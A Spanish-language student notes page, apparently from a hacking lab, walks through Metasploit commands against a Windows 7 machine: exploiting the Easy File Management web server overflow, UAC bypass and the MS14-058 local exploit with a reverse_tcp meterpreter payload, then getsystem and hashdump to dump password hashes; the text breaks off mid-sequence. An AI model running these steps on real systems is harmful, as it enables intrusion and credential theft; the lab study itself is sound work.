Essays.club - Ensayos gratis, notas de cursos, notas de libros, tareas, monografías y trabajos de investigación
Buscar

Prueba Para entar.... msfconsole

Enviado por   •  31 de Octubre de 2018  •  844 Palabras (4 Páginas)  •  403 Visitas

Página 1 de 4

...

http://www.seguridadapple.com/2015/03/poc-proxy-prototype-privileged.html

-------------------------------------------------------------------------

---------------------

EXPLOTACION LOCAL

----------------------

aprovechando la ultimo ejemplo

accedemos con el ususrio Administrador de win 7(real) de la Maquina

Ejecutamos el Easy File...

use exploit/windows/http/efs_fmws_userid_bof (enter)

sessions -K (enter)

getuid (enter) nos damos cuenta que es el aministrado de la maquina

getprivs (enter) (nos muestra que tiente muchos privilegios)

uno importante es SeSystemEnvironmentPrivilegue

significa que puedor hacer cualquier cosa al sistema de win

getuid (enter)

run hashdump (enter) Almacena un fichero de hash

se trata de hacer un volcado de hashce

PERO NO ESTOY EN UN COTEXTO DE SYSTEM

getprivs (enter)

getsystems (enter) para poder hacer un volcado de hashses

getuid (enter)

run hashdump (enter)

exit

-----

Despues accedmeos con un usurio de grupo de adminsitradores

-----

y ejecutamos el Easy file

exploit (enter)

getuid (enter)

getprivs (enter)

--- no se puede hacer

getsystem

---mucho menos

run hashdump

----como sabemos que el ususrio es un usuario de grupo

de administradores

shell (enter)

c:\Windows\system32> net localgroup administrators (enter)

exit (enter)

--Entonces hay que hacer un bypass de UAC de la maquina

yy si UAC esta configurada por defecto.

background (enter)

use exploit/windows/local/bypassuac

(leer algunos articulo en los foros)

show options (enter)

--Dentro de esto hay al muy importate que la SESSION

QUE NOS DA un identificador

sessions (enter)

set SESSION 4 (enter)

set PAYLOAD windows/meterpreter/reverse_tcp (enter)

set LHOST 192.168.1.15 (enter)

exploit ( enter)

jobs -K (enter)

exploit ( enter)

---tras el efecto el bypass esta connseguido

pero si nos damos cuenta

getuid (enter)

--no somos ususrios system

--pero si enmeos privilegios

getprivs (enter)

--ya podemos hacer como system

getsystem (enter)

run hashdump (enter)

--cerramos la sessiones

background (enter)

sessions (enter)

sessions -K (enter)

--------------------------------------------------

ahora cuando el ususrio no es adminsitrador ni

pertenese al grupo admisnitrador

--------------------------------------------------

abrimos win con ese tipo de usuario

use exploit/windows/http/efs_fmws_userid_bof (enter)

exploit (enter)

getuid (enter)

--como vemos tenemos poco privilegios

--por lo que tendriamos que ver que parches tiene esta maquina

background (enter)

sessions -i 6 (enter)

shell (eneter)

systeminfo (enter)

----------------------

windows exploit suggester

herramienta para ver hacer un machin de los parche que existen y ver los que falta

y ver que exploit puedo ejecutar

----------------------

---Usariao iuun exploi local

exit (enter)

background (enter)

use /exploit/windows/local/ms14_058_track_popup_menu (enter)

set SESSION 6 (enter)

set PAYLOAD windows/meterpreter/reverse_tcp (enter)

set

...

Descargar como  txt (6.5 Kb)   pdf (52.8 Kb)   docx (16.6 Kb)  
Leer 3 páginas más »
Disponible sólo en Essays.club